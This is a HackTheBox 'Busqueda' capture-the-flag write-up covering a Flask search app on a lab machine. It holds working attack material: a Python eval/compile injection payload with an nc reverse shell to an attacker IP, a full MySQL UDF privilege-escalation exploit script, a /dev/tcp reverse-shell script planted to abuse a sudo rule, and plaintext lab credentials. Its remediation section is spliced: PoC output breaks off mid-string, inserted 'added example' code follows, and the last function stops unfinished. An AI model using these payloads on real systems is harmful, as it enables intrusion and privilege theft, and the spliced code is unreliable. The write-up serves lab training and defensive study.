HTB Busqueda | Linux Easy

HackTheBox Busqueda is an Easy rated Linux machine. This machine, plagued with OWASP Injection (A03:2021) and Security Misconfiguration (A05:2021) weaknesses, emphasises the need to specify absolute paths to files and to define access control.

Attack Chain: The attacker begins by exploiting a code injection vulnerability in the Python application and, after gaining a foothold, abuses a housekeeping script to escalate privileges.

Initialization

# connect to vpn
sudo openvpn --auth-nocache --config lab_connection.ovpn

Enumeration

# discover ports and services
sudo nmap -F -Pn -sSUV --script 'default,exploit' -vvv 10.10.11.208 -oA nmap_busqueda
xsltproc nmap_busqueda.xml -o nmap_busqueda.html    # converts xml to html
firefox nmap_busqueda.html                        # view in browser
#-snip-#
22/tcp  open  OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 
80/tcp  open  Apache httpd 2.4.52(OPTIONS HEAD GET )

# discover technologies used
whatweb 10.10.11.208      # if a domain exists, add it to the hosts file and rerun the command
#-snip-#
HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)]
RedirectLocation[http://searcher.htb/]

Bootstrap[4.1.3]
HTTPServer[Werkzeug/2.1.2 Python/3.10.6]
JQuery[3.2.1]
Python[3.10.6]
Werkzeug[2.1.2]

# add the domain to hosts file
echo '10.10.11.208 searcher.htb' | sudo tee -a /etc/hosts

# investigate existing headers
curl -I http://searcher.htb/
#-snip-#
HTTP/1.1 200 OK
Date: Wed, 12 Apr 2023 10:19:18 GMT
Server: Werkzeug/2.1.2 Python/3.10.6
Content-Type: text/html; charset=utf-8
Content-Length: 13519

# discover subdomains
# with ffuf
ffuf -c -u http://searcher.htb/ -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H 'Host: FUZZ.searcher.htb' -t 50 -ac -s 

# with gobuster
gobuster vhost -u http://10.10.11.208/ -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt -t 50

gobuster dns -d searcher.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 50

# wfuzz
wfuzz -c -t 50 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://searcher.htb/ -H 'Host: FUZZ.searcher.htb' --hc '302'

# discover directories
# with ffuf
ffuf -c -u http://searcher.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -t 50 -ac -s
#-snip-#
search

# with gobuster
gobuster dir -u http://searcher.htb/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -t 50
#-snip-#
/search    405

# with dirsearch
dirsearch -u http://searcher.htb/ -t 50 -q -r
#-snip-#
/search  405

# with wfuzz
wfuzz -z file,/usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -t 50 -u http://searcher.htb/FUZZ --hc 404
#-snip-#
/  200

Exploration

Investigated the site and /search and found that it is an app that takes a word or sentence and searches for it on a selected search engine. Scanned the site with Burp Suite, which suggested a Python code injection. Further research turned up the resource Exploiting Python Code Injection in Web Applications.

/images/busqueda/busqueda01.png
Searcher Homepage

/images/busqueda/busqueda02.png
Searcher Code Injection Discovered

Exploitation

Used Burp Suite to deliver the payload that gained a foothold on the machine. I adapted the payload '+eval(compile('for x in range(1):\n import os\n os.system("cat /etc/passwd")','a','single'))+' to disclose the /etc/passwd file, then improved on it with the payload '+eval(compile("""__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.48 9011 >/tmp/f')""",'','single'))+', URL-encoding it to get a shell on the machine.

/images/busqueda/busqueda03.png
Searcher Foothold

# upgrade to a full tty
python3 -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; 

ls -lah
#-snip-#
-rw-r--r-- 1 www-data www-data 1.1K Dec  1 14:22 app.py
drwxr-xr-x 8 www-data www-data 4.0K Apr 12 09:39 .git
drwxr-xr-x 2 www-data www-data 4.0K Dec  1 14:35 templates

ls -lah .git
#-snip-#
-rw-r--r-- 1 www-data www-data  294 Dec  1 14:35 config
-rw-r--r-- 1 www-data www-data   73 Dec  1 14:35 description
-rw-r--r-- 1 www-data www-data   21 Dec  1 14:35 HEAD
drwxr-xr-x 2 www-data www-data 4.0K Dec  1 14:35 hooks

cat .git/config
#-snip-#
[remote "origin"]
	url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git

cd ~        # change to shell user home directory
ls -lah
#-snip-#
-rw-rw-r-- 1 svc  svc    76 Apr  3 08:58 .gitconfig
drwxrwxr-x 5 svc  svc  4.0K Jun 15  2022 .local
lrwxrwxrwx 1 root root    9 Apr  3 08:58 .mysql_history -> /dev/null
-rw-r--r-- 1 svc  svc   807 Jan  6  2022 .profile
lrwxrwxrwx 1 root root    9 Feb 20 14:08 .searchor-history.json -> /dev/null
-rw-r----- 1 root svc    33 Apr 11 09:54 user.txt

cat user.txt   # capture the user flag

Escalation

ss -tlpn
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process                                                  
LISTEN 0      128        127.0.0.1:5000       0.0.0.0:*    users:(("python3",pid=1492,fd=6),("python3",pid=1492,fd=4)) 
LISTEN 0      4096       127.0.0.1:3306       0.0.0.0:*                                                            
LISTEN 0      4096   127.0.0.53%lo:53         0.0.0.0:*                                                            
LISTEN 0      128          0.0.0.0:22         0.0.0.0:*                                                            
LISTEN 0      4096       127.0.0.1:3000       0.0.0.0:*                                                            
LISTEN 0      4096       127.0.0.1:39611      0.0.0.0:*                                                            
LISTEN 0      4096       127.0.0.1:222        0.0.0.0:*                                                            
LISTEN 0      511                *:80               *:*                                                            
LISTEN 0      128             [::]:22            [::]:*      

sudo -l     # on prompt submit: jh1usoih2bkjaspwe92
#-snip-#
User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

# ssh into the box as svc user with the above password
ssh svc@searcher.htb  # on prompt submit: jh1usoih2bkjaspwe92

sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
#-snip-#
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)
 docker-ps     : List running docker containers
 docker-inspect : Inpect a certain docker container
 full-checkup  : Run a full system checkup

sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
#-snip-#
CONTAINER ID   IMAGE                COMMAND                  CREATED        STATUS       PORTS                                             NAMES
960873171e2e   gitea/gitea:latest   "/usr/bin/entrypoint…"   3 months ago   Up 3 hours   127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp   gitea
f84a6b33fb5a   mysql:8              "docker-entrypoint.s…"   3 months ago   Up 3 hours   127.0.0.1:3306->3306/tcp, 33060/tcp               mysql_db

sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' f84
#-snip-# stored as mysql_container_data
"MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF",
"MYSQL_USER=gitea",
"MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh",
"MYSQL_DATABASE=gitea",
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"GOSU_VERSION=1.14",
"MYSQL_MAJOR=8.0",
"MYSQL_VERSION=8.0.31-1.el8",
"MYSQL_SHELL_VERSION=8.0.31-1.el8"

sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' 960
#-snip-# stored as gitea_container_data
"USER_UID=115",
"USER_GID=121",
"GITEA__database__DB_TYPE=mysql",
"GITEA__database__HOST=db:3306",
"GITEA__database__NAME=gitea",
"GITEA__database__USER=gitea",
"GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh",
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"USER=git",
"GITEA_CUSTOM=/data/gitea"

sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
#-snip-#
Something went wrong

ls -lah /opt/scripts/
#-snip-# cannot read the files in this directory
-rwx--x--x 1 root root  586 Dec 24 21:23 check-ports.py
-rwx--x--x 1 root root  857 Dec 24 21:23 full-checkup.sh
drwxr-x--- 8 root root 4.0K Apr  3 15:04 .git
-rwx--x--x 1 root root 3.3K Dec 24 21:23 install-flask.sh
-rwx--x--x 1 root root 1.9K Dec 24 21:23 system-checkup.py

# investigated the database
mysql -h 127.0.0.1 -u gitea -pyuiu1hoiu4i5ho1uh gitea

show databases;
+--------------------+
| Database           |
+--------------------+
| gitea              |
| information_schema |
| performance_schema |
+--------------------+

show tables;
+---------------------------+
| Tables_in_gitea           |
+---------------------------+
| access                    |
| access_token              |
| action                    |
| app_state                 |
| attachment                |
| badge                     |
| collaboration             |
| comment                   |
| commit_status             |
| commit_status_index       |
| deleted_branch            |
| deploy_key                |
| email_address             |
| email_hash                |
| external_login_user       |
| follow                    |
| foreign_reference         |
| gpg_key                   |
| gpg_key_import            |
| hook_task                 |
| issue                     |
| issue_assignees           |
| issue_content_history     |
| issue_dependency          |
| issue_index               |
| issue_label               |
| issue_user                |
| issue_watch               |
| label                     |
| language_stat             |
| lfs_lock                  |
| lfs_meta_object           |
| login_source              |
| milestone                 |
| mirror                    |
| notice                    |
| notification              |
| oauth2_application        |
| oauth2_authorization_code |
| oauth2_grant              |
| org_user                  |
| package                   |
| package_blob              |
| package_blob_upload       |
| package_file              |
| package_property          |
| package_version           |
| project                   |
| project_board             |
| project_issue             |
| protected_branch          |
| protected_tag             |
| public_key                |
| pull_auto_merge           |
| pull_request              |
| push_mirror               |
| reaction                  |
| release                   |
| renamed_branch            |
| repo_archiver             |
| repo_indexer_status       |
| repo_redirect             |
| repo_topic                |
| repo_transfer             |
| repo_unit                 |
| repository                |
| review                    |
| review_state              |
| session                   |
| star                      |
| stopwatch                 |
| system_setting            |
| task                      |
| team                      |
| team_invite               |
| team_repo                 |
| team_unit                 |
| team_user                 |
| topic                     |
| tracked_time              |
| two_factor                |
| upload                    |
| user                      |
| user_badge                |
| user_open_id              |
| user_redirect             |
| user_setting              |
| version                   |
| watch                     |
| webauthn_credential       |
| webhook                   |
+---------------------------+

pager less -SFX
describe user;
+--------------------------------+---------------+------+-----+---------+----->
| Field                          | Type          | Null | Key | Default | Extr>
+--------------------------------+---------------+------+-----+---------+----->
| id                             | bigint        | NO   | PRI | NULL    | auto>
| lower_name                     | varchar(255)  | NO   | UNI | NULL    |     >
| name                           | varchar(255)  | NO   | UNI | NULL    |     >
| full_name                      | varchar(255)  | YES  |     | NULL    |     >
| email                          | varchar(255)  | NO   |     | NULL    |     >
| keep_email_private             | tinyint(1)    | YES  |     | NULL    |     >
| email_notifications_preference | varchar(20)   | NO   |     | enabled |     >
| passwd                         | varchar(255)  | NO   |     | NULL    |     >
| passwd_hash_algo               | varchar(255)  | NO   |     | argon2  |     >
| must_change_password           | tinyint(1)    | NO   |     | 0       |     >
| login_type                     | int           | YES  |     | NULL    |     >
| login_source                   | bigint        | NO   |     | 0       |     >
| login_name                     | varchar(255)  | YES  |     | NULL    |     >
| type                           | int           | YES  |     | NULL    |     >
| location                       | varchar(255)  | YES  |     | NULL    |     >
| website                        | varchar(255)  | YES  |     | NULL    |
| rands                          | varchar(32)   | YES  |     | NULL    |     >
| salt                           | varchar(32)   | YES  |     | NULL    |     >
| language                       | varchar(5)    | YES  |     | NULL    |     >
| description                    | varchar(255)  | YES  |     | NULL    |     >
| created_unix                   | bigint        | YES  | MUL | NULL    |     >
| updated_unix                   | bigint        | YES  | MUL | NULL    |     >
| last_login_unix                | bigint        | YES  | MUL | NULL    |     >
| last_repo_visibility           | tinyint(1)    | YES  |     | NULL    |     >
| max_repo_creation              | int           | NO   |     | -1      |     >
| is_active                      | tinyint(1)    | YES  | MUL | NULL    |     >
| is_admin                       | tinyint(1)    | YES  |     | NULL    |     >
| is_restricted                  | tinyint(1)    | NO   |     | 0       |     >
| allow_git_hook                 | tinyint(1)    | YES  |     | NULL    |     >
| allow_import_local             | tinyint(1)    | YES  |     | NULL    |     >
| allow_create_organization      | tinyint(1)    | YES  |     | 1       |     >
| prohibit_login                 | tinyint(1)    | NO   |     | 0       |     >
| avatar                         | varchar(2048) | NO   |     | NULL    |     >
| avatar_email                   | varchar(255)  | NO   |     | NULL    |     >
| use_custom_avatar              | tinyint(1)    | YES  |     | NULL    |     >
| num_followers                  | int           | YES  |     | NULL    |     >
| num_following                  | int           | NO   |     | 0       |     >
| num_stars                      | int           | YES  |     | NULL    |     >
| num_repos                      | int           | YES  |     | NULL    |     >
| num_teams                      | int           | YES  |     | NULL    |     >
| num_members                    | int           | YES  |     | NULL    |     >
| visibility                     | int           | NO   |     | 0       |     >
| repo_admin_change_team_access  | tinyint(1)    | NO   |     | 0       |     >
| diff_view_style                | varchar(255)  | NO   |     |         |     >
| theme                          | varchar(255)  | NO   |     |         |     >
| keep_activity_private          | tinyint(1)    | NO   |     | 0       |     >
+--------------------------------+---------------+------+-----+---------+-----

select name,passwd,salt from user;
#-snip-# stored as gitea_users_creds
+---------------+------------------------------------------------------------------------------------------------------+----------------------------------+
| name          | passwd                                                                                               | salt                             |
+---------------+------------------------------------------------------------------------------------------------------+----------------------------------+
| administrator | ba598d99c2202491d36ecf13d5c28b74e2738b07286edc7388a2fc870196f6c4da6565ad9ff68b1d28a31eeedb1554b5dcc2 | a378d3f64143b284f104c926b8b49dfb |
| cody          | b1f895e8efe070e184e5539bc5d93b362b246db67f3a2b6992f37888cb778e844c0017da8fe89dd784be35da9a337609e82e | d1db0a75a18e50de754be2aafcad5533 |
+---------------+------------------------------------------------------------------------------------------------------+----------------------------------+

\quit
# skipped cracking the password hashes for now, but would eventually have gone down that route

I veered towards a local privilege escalation through MySQL since I had the MySQL root password. Downloaded the Exploit-DB 46249 exploit and modified it appropriately.

# checked for the mysql version and plugin directory details
mysql -h 127.0.0.1 -u root -pjI86kGUuj87guWr3RyF -e "show variables like '%version%';"
mysql -h 127.0.0.1 -u root -pjI86kGUuj87guWr3RyF -e "show variables like '%plugin%';"

# dumped the database using the root user in case I needed to look closely
mysqldump -h 127.0.0.1 -u root -pjI86kGUuj87guWr3RyF -d gitea --result-file=dump.sql

# installed 2to3 and converted the exploit from python2 to python3
sudo apt install 2to3
2to3 46249.py   # upload to the victim machine after making appropriate modifications

modified 46249.py

# Exploit Title: MySQL User-Defined (Linux) x32 / x86_64 sys_exec function local privilege escalation exploit
# Date: 24/01/2019
# Exploit Author: d7x
# Vendor Homepage: https://www.mysql.com
# Software Link: www.mysql.com
# Version: MySQL 4.x/5.x
# Tested on: Debian GNU/Linux 8.11 / mysql  Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (x86_64) using readline 6.3
# CVE : N/A

'''
*** MySQL User-Defined (Linux) x32 / x86_64 sys_exec function local privilege escalation exploit ***


UDF lib shellcodes retrieved from metasploit
(there are windows .dll libraries within metasploit as well so this could be easily ported to Windows)

Based on the famous raptor_udf.c by Marco Ivaldi (EDB ID: 1518)
CVE: N/A
References:
https://dev.mysql.com/doc/refman/5.5/en/create-function-udf.html
https://www.exploit-db.com/exploits/1518
https://www.exploit-db.com/papers/44139/ - MySQL UDF Exploitation by Osanda Malith Jayathissa (@OsandaMalith)

Tested on 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux

@d7x_real
https://d7x.promiselabs.net
https://www.promiselabs.net
'''


import sys
import subprocess
import platform, random
import argparse
import os
import re
import pty

shellcode_x32 = "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";
shellcode_x64 = "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";

shellcode = shellcode_x32
if (platform.architecture()[0] == '64bit'):
 shellcode = shellcode_x64

# MySQL username and password: make sure you have FILE privileges and mysql is actually running as root
# username='root'
# password=''

###
#if len(sys.argv) != 2:
#	print "Usage: %s <username> <password>" % argv[0]

#username=sys.argv[1];
#password=sys.argv[2];
###

parser = argparse.ArgumentParser()
parser.add_argument('--username', '-u', help='MySQL username', type=str, required=True)
parser.add_argument('--password', '-p', help='MySQL password', type=str)

args = parser.parse_args()

username=args.username
password=args.password	

if not password:
	password=''
	
cmd='mysql -h 127.0.0.1 -u root -p\'' + password + '\' -e "select @@plugin_dir \G"'
plugin_str = subprocess.check_output(cmd, shell=True).decode('utf-8')
plugin_dir = re.search('@plugin_dir: (\S*)', plugin_str)
res = bool(plugin_dir)

if not res:
 print("Error: could not locate the plugin directory")
 sys.exit(1);
	
plugin_dir_ = plugin_dir.group(1)

print("Plugin dir is %s" % plugin_dir_)

# file to save the udf so file to
udf_filename = 'udf' + str(random.randint(1000,10000)) + '.so'
udf_outfile = plugin_dir_ + udf_filename

# alternative way:
# set @outputpath := @@plugin_dir; set @outputpath := @@plugin_dir;

print("Trying to create a udf library...");
os.system('mysql -h 127.0.0.1 -u root -p\'' + password + '\' -e "select binary 0x' + shellcode + ' into dumpfile \'%s\' \G"' % udf_outfile)
res = os.path.isfile(udf_outfile)

if not res:
 print("Error: could not create udf file in %s (mysql is either not running as root or may be file exists?)" % udf_outfile)
 sys.exit(1);

print("UDF library crated successfully: %s" % udf_outfile);
print("Trying to create sys_exec...")
os.system('mysql -h 127.0.0.1 -u root -p\'' + password + '\' -e "create function sys_exec returns int soname \'%s\'\G"' % udf_filename)

print("Checking if sys_exec was crated...")
cmd='mysql -h 127.0.0.1 -u root -p\'' + password + '\' -e "select * from mysql.func where name=\'sys_exec\' \G"';
res = subprocess.check_output(cmd, shell=True);

if (res == ''):
	print("sys_exec was not found (good luck next time!)")

if res:
	print("sys_exec was found: %s" % res)
	print("Generating a suid binary in /tmp/sh...")
	os.system('mysql -h 127.0.0.1 -u root -p\'' + password + '\' -e "select sys_exec(\'cp /bin/sh /tmp/; chown root:root /tmp/sh; chmod +s /tmp/sh\')"')
	
	print("Trying to spawn a root shell...")
	pty.spawn("/tmp/sh");

/images/busqueda/busqueda04.png
Failed Local Privilege Escalation

Then came the thought to explore the Gitea repositories. Started an SSH tunnel, logged in with the tabulated credentials and downloaded the repositories.

# open a tunnel to access gitea
ssh -L 3000:127.0.0.1:3000 -N -f svc@searcher.htb # on prompt submit: jh1usoih2bkjaspwe92

# unpack the downloads
unzip Searcher_site-main.zip 
unzip scripts-main.zip

# to kill the tunnel session afterward use
lsof -i:3000 | grep ssh   # get the PID
kill -9 $PID

Username       Password             Download
cody           jh1usoih2bkjaspwe92  Searcher_site
administrator  yuiu1hoiu4i5ho1uh    scripts

/images/busqueda/busqueda05.png
Accessing Gitea

/images/busqueda/busqueda06.png
Searcher Site Script

/images/busqueda/busqueda07.png
Searcher Site Script

I combed through each user's account for sensitive credentials. Studied the scripts' source code and immediately noticed why the command sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup was throwing an error: it expects a file named 'full-checkup.sh' in the current working directory of the caller.

system-checkup.py

#!/bin/bash
import subprocess
import sys

actions = ['full-checkup', 'docker-ps','docker-inspect']

def run_command(arg_list):
    r = subprocess.run(arg_list, capture_output=True)
    if r.stderr:
        output = r.stderr.decode()
    else:
        output = r.stdout.decode()

    return output


def process_action(action):
    if action == 'docker-inspect':
        try:
            _format = sys.argv[2]
            if len(_format) == 0:
                print(f"Format can't be empty")
                exit(1)
            container = sys.argv[3]
            arg_list = ['docker', 'inspect', '--format', _format, container]
            print(run_command(arg_list)) 
        
        except IndexError:
            print(f"Usage: {sys.argv[0]} docker-inspect <format> <container_name>")
            exit(1)
    
        except Exception as e:
            print('Something went wrong')
            exit(1)
    
    elif action == 'docker-ps':
        try:
            arg_list = ['docker', 'ps']
            print(run_command(arg_list)) 
        
        except:
            print('Something went wrong')
            exit(1)

    elif action == 'full-checkup':
        try:
            arg_list = ['./full-checkup.sh']
            print(run_command(arg_list))
            print('[+] Done!')
        except:
            print('Something went wrong')
            exit(1)
            

if __name__ == '__main__':

    try:
        action = sys.argv[1]
        if action in actions:
            process_action(action)
        else:
            raise IndexError

    except IndexError:
        print(f'Usage: {sys.argv[0]} <action> (arg1) (arg2)')
        print('')
        print('     docker-ps     : List running docker containers')
        print('     docker-inspect : Inpect a certain docker container')
        print('     full-checkup  : Run a full system checkup')
        print('')
        exit(1)

# start a listener on the attacker machine
nc -lvnp 9011

# create a reverse shell script at the home directory of the victim machine
#-nano full-checkup.sh-#
#! /bin/bash
bash -c "bash -i >& /dev/tcp/10.10.14.48/9011 0>&1"
#-full-checkup.sh-#

chmod 775 full-checkup.sh       # make the script executable

# execute the vulnerable command
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

/images/busqueda/busqueda08.png
Privilege Escalated

Privilege Escalation Alternative Technique

# create a script in the home directory of the victim machine that sets the SUID bit on bash
#-nano full-checkup.sh-#
#! /bin/bash
chmod +s /usr/bin/bash
#-full-checkup.sh-#

chmod 775 full-checkup.sh

# execute the vulnerable command
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
[+] Done!

/usr/bin/bash -p
cat /root/root.txt    # capture root flag

Exfiltration

We earlier exfiltrated the source code and some sensitive data, amongst which are the user and database credentials.

Remediation

Fixing the Foothold Vector

app.py

from flask import Flask, render_template, request, redirect
from searchor import Engine
import subprocess


app = Flask(__name__)

@app.route('/')
def index():
    return render_template('index.html', options=Engine.__members__, error='')

@app.route('/search', methods=['POST'])
def search():
    try:
        engine = request.form.get('engine')
        query = request.form.get('query')
        auto_redirect = request.form.get('auto_redirect')
        
        if engine in Engine.__members__.keys():
            arg_list = ['searchor', 'search', engine, query]
            r = subprocess.run(arg_list, capture_output=True)
            url = r.stdout.strip().decode()
            if auto_redirect is not None:
                return redirect(url, code=302)
            else:
                return url

        else:
            return render_template('index.html', options=Engine.__members__, error="Invalid engine!")

    except Exception as e:
        print(e)
        return render_template('index.html', options=Engine.__members__, error="Something went wrong!")

if __name__ == '__main__':
    app.run(debug=False)

Lines 15, 20 - 22 of the above source code resulted in the foothold on the system. The application developer trusted the user input without sanitising it and wrongly used the Python subprocess module in their code.

13	def search():
14	    try:
15	        engine = request.form.get('engine')
16	        query = request.form.get('query')
17	        auto_redirect = request.form.get('auto_redirect')
18	        
19	        if engine in Engine.__members__.keys():
20	            arg_list = ['searchor', 'search', engine, query]
21	            r = subprocess.run(arg_list, capture_output=True)
22	            url = r.stdout.strip().decode()

Generally the subprocess module is a very delicate module; I would lean towards finding another library to implement that feature, since the developer needed to return the full URL to the user in the event they didn't tick auto-redirect. OS Command Injection in Python - SecureFlag and Command injection prevention for Python - Semgrep discuss how to prevent the flaw. I would also argue that this foothold was made possible by the slightly sophisticated nature of the payload, which uses the eval and compile built-in Python functions. Take a look at the attack PoC below. Note that the HTTP listener decodes URL-encoded parameters, and the code implicitly executes Python code since the system is running a Python 3 interpreter.

python3
>>> eval("dir()")
['__annotations__', '__builtins__', '__doc__', '__loader__', '__name__', '__package__', '__spec__']

>>> eval(compile("dir()",'','single'))
['__annotations__', '__builtins__', '__doc__', '__loader__', '__name__', '__package__', '__spec__']

# the above commands return the names in the current scope, since that is what dir() does. reference: https://docs.python.org/3/library/functions.html#dir

>>> eval(compile('''__import__('os').system('cat /etc/passwd')''','','single'))
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

>>> import subprocess
>>> subprocess.run(["cat","/etc/passwd"], capture_output=True)
CompletedProcess(args=['cat', '/etc/passwd'], returncode=0, stdout=b'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\n', stderr=b'')

>>> payload="eval(compile('''__import__('os').system('cat /etc/passwd')''','','single'))"
>>> subprocess.run(["python3","-c",payload], capture_output=True)
CompletedProcess(args=['python3', '-c', "eval(compile('''__import__('os').system('cat /etc/passwd')''','','single'))"], returncode=0, stdout=b'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\n
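The remediation the paragraph above argues for is to stop handing the query to anything that evaluates it. The following handler is an added example, not the page's or the Searcher project's code: it builds the engine URL in-process with urllib.parse.quote_plus from a fixed allowlist of templates (the three templates are an assumption of this example), so the query is only ever data, and it mimics the Flask handler's contract (302 with Location on auto_redirect, otherwise 200 with the URL) without importing Flask.

```python
from urllib.parse import quote_plus

# Allowlist of engine URL templates. These templates are an assumption of
# this example; the original app delegated URL building to the searchor CLI.
ENGINE_TEMPLATES = {
    "Google": "https://www.google.com/search?q={q}",
    "Bing": "https://www.bing.com/search?q={q}",
    "DuckDuckGo": "https://duckduckgo.com/?q={q}",
}

MAX_QUERY_LEN = 512


def build_search_url(engine, query):
    """Build the search URL in-process: no subprocess, no shell, no eval.

    The query is treated purely as data. It is length-limited and
    percent-encoded, so the quotes, parentheses and '+' of an injection
    payload become inert %27/%28/%29/%2B sequences inside the URL.
    The allowlist also prevents the redirect from leaving the known engines.
    """
    try:
        template = ENGINE_TEMPLATES[engine]
    except KeyError:
        raise ValueError("Invalid engine!") from None
    if not isinstance(query, str) or not query.strip():
        raise ValueError("Query can't be empty")
    if len(query) > MAX_QUERY_LEN:
        raise ValueError("Query too long")
    # quote_plus encodes '{' and '}' too, so the format call cannot be abused.
    return template.format(q=quote_plus(query))


def handle_search(form):
    """Mimic the /search handler's contract without Flask.

    Returns (status, headers, body): 302 plus a Location header when
    auto_redirect is set, otherwise 200 with the URL as the body.
    Validation failures become a 400 instead of a stack trace.
    """
    try:
        url = build_search_url(form.get("engine"), form.get("query", ""))
    except ValueError as e:
        return 400, {}, str(e)
    if form.get("auto_redirect") is not None:
        return 302, {"Location": url}, ""
    return 200, {}, url


if __name__ == "__main__":
    # Constructed inputs: a benign query and the eval/compile probe from the PoC.
    print(handle_search({"engine": "Google", "query": "hello world"}))
    print(handle_search({"engine": "Google",
                         "query": "'+eval(compile(\"dir()\",'','single'))+'"}))
```

Feeding the PoC payload through build_search_url yields a URL whose query part contains no raw quote or parenthesis, which is what makes the in-process approach safe regardless of what the downstream engine does with it.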

Fixing the Privilege Escalation Vector

The privilege escalation can be attributed to carelessness on the part of the developer and the administrator. The users failed to enable 2FA on their Gitea accounts. There is also a problem of password reuse; good practice is for service accounts to have entirely different credentials from user accounts. The disclosure of the MySQL and Gitea credentials from the containers is something peculiar to containers: they need these credentials to run, and the credentials can even be found in their logs.

Although the administrator did well to restrict access to the scripts, assuming that system-checkup.py would always be run from within the scripts directory, and thus resolving full-checkup.sh relative to the current working directory, resulted in root privilege being gained. Using the absolute path to the file would have prevented this. Snippet fixing the flaw:

2	import subprocess
3	import sys
4	
5	import os
6	script_path = os.path.abspath(__file__)
7	file_path = os.path.join(os.path.dirname(script_path), 'full-checkup.sh')


49   elif action == 'full-checkup':
50        try:
51            arg_list = [file_path]

fixed system-checkup.py

#!/usr/bin/env python3
import subprocess
import sys

import os
script_path = os.path.abspath(__file__)
file_path = os.path.join(os.path.dirname(script_path), 'full-checkup.sh')

actions = ['full-checkup', 'docker-ps','docker-inspect']

def run_command(arg_list):
    r = subprocess.run(arg_list, capture_output=True)
    if r.stderr:
        output = r.stderr.decode()
    else:
        output = r.stdout.decode()

    return output


def process_action(action):
    if action == 'docker-inspect':
        try:
            _format = sys.argv[2]
            if len(_format) == 0:
                print(f"Format can't be empty")
                exit(1)
            container = sys.argv[3]
            arg_list = ['docker', 'inspect', '--format', _format, container]
            print(run_command(arg_list)) 
        
        except IndexError:
            print(f"Usage: {sys.argv[0]} docker-inspect <format> <container_name>")
            exit(1)
    
        except Exception as e:
            print('Something went wrong')
            exit(1)
    
    elif action == 'docker-ps':
        try:
            arg_list = ['docker', 'ps']
            print(run_command(arg_list)) 
        
        except:
            print('Something went wrong')
            exit(1)

    elif action == 'full-checkup':
        try:
            arg_list = [file_path]
            print(run_command(arg_list))
            print('[+] Done!')
        except:
            print('Something went wrong')
            exit(1)
            

if __name__ == '__main__':

    try:
        action = sys.argv[1]
        if action in actions:
            process_action(action)
        else:
            raise IndexError

    except IndexError:
        print(f'Usage: {sys.argv[0]} <action> (arg1) (arg2)')
        print('')
        print('     docker-ps     : List running docker containers')
        print('     docker-inspect : Inpect a certain docker container')
        print('     full-checkup  : Run a full system checkup')
        print('')
        exit(1)

Notice that the full-checkup subcommand now runs the intended action. The attacker was unable to gain root privilege after crafting their own full-checkup.sh file.
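The absolute-path fix removes the dependence on the caller's working directory. A defender would also want the privileged script to refuse a helper that has been tampered with, since sudo runs it as root. The following is an added example, not the page's or the machine's own code: it resolves the helper next to the script with os.path.realpath (so a symlinked script location cannot redirect the lookup) and checks that the helper and its directory are owned by the trusted uid and not writable by group or others before executing it. The demo() fixture (a scratch directory, a stand-in script, trusted_uid set to the current user rather than root so it runs unprivileged) is constructed for illustration.

```python
import os
import stat
import subprocess
from pathlib import Path


def resolve_helper(script_file, helper_name="full-checkup.sh"):
    """Locate the helper next to the script, independent of the caller's cwd."""
    script_dir = Path(os.path.realpath(script_file)).parent
    return script_dir / helper_name


def check_helper(path, trusted_uid=0):
    """Refuse to run the helper unless it is a regular file (not a symlink)
    owned by trusted_uid and writable only by that owner; the containing
    directory must satisfy the same ownership and write-bit rules."""
    path = Path(path)
    for candidate, what in ((path, "helper"), (path.parent, "directory")):
        st = os.lstat(candidate)  # lstat: a planted symlink is not followed
        if what == "helper" and not stat.S_ISREG(st.st_mode):
            raise PermissionError(f"{candidate}: not a regular file")
        if st.st_uid != trusted_uid:
            raise PermissionError(
                f"{candidate}: owned by uid {st.st_uid}, expected {trusted_uid}")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            raise PermissionError(f"{candidate}: writable by group or others")
    return path


def run_full_checkup(script_file, trusted_uid=0):
    """The hardened 'full-checkup' action: resolve, verify, then execute."""
    helper = check_helper(resolve_helper(script_file), trusted_uid)
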